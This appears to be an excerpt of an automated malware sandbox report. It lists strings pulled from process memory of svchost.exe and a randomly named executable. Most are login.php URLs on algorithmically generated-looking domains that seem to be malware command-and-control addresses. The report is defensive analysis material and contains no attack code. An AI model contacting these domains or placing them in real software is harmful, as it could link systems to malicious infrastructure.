Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498635965.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjof.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjyc.com/
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojymet.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojypat.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001297000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vojyqem.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815884349.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603144571.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817894345.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzyt.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648070186.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651544037.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybut.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076185402.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950331749.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950940753.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2075366204.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951109934.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1948330211.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycem.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1802479518.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyf.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyt.com/H
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjif.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykyc.com/http://gadyniw.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 
http://volykyc.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymum.com/http://lyvylyn.com/http://gadyveb.com/H
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1733345122.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymum.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/P
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://volyqat.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564981200.000000000CC62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567835804.000000000CC6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 
http://volyqat.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840908556.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620757969.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840416294.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620677895.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618514695.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620758729.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621135281.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621261518.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617312754.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/login.php
Source: svchost.exe, 00000002.00000003.2664767542.0000000003FD4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2687870645.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708640819.000000000CCC0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2668722349.000000000CC63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150
Source: svchost.exe, svchost.exe, 00000002.00000003.1683821239.0000000005A29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648068445.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655699259.000000000CCE5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522947923.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792452110.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649930029.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632991036.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1637900165.00000000032BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792459921.000000000338D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657433087.000000000CC91000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881318684.000000000CC79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1737220209.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879077050.000000000CC7D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639879384.000000000326A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1905400482.000000000CCDE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1739913087.000000000CCD6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648826141.0000000000875000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731174745.000000000CCE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1815491501.000000000CCE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: svchost.exe, 00000002.00000003.1655699259.000000000CCE5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677711627.000000000CC8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000337A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879077050.000000000CC7D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1905400482.000000000CCDE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559620956.0000000005A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852061199.0000000005AA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638510682.000000000CCD6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809367795.0000000005A9E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809367795.0000000005A92000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735224157.0000000005A6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581032516.000000000327B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663534768.0000000005A0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631665579.000000000CC7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469670760.000000000331D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662318974.000000000CCE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600469380.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1659665081.0000000005A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC91000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1631973606.00000000032BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677711627.000000000CC8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000002.00000003.2046005839.000000000CC82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt-
Source: svchost.exe, 00000002.00000003.1475968169.0000000000863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604239614.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660420575.000000000CCD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtC
Source: svchost.exe, 00000002.00000003.1677711627.000000000CC94000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844292183.0000000005AA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtN
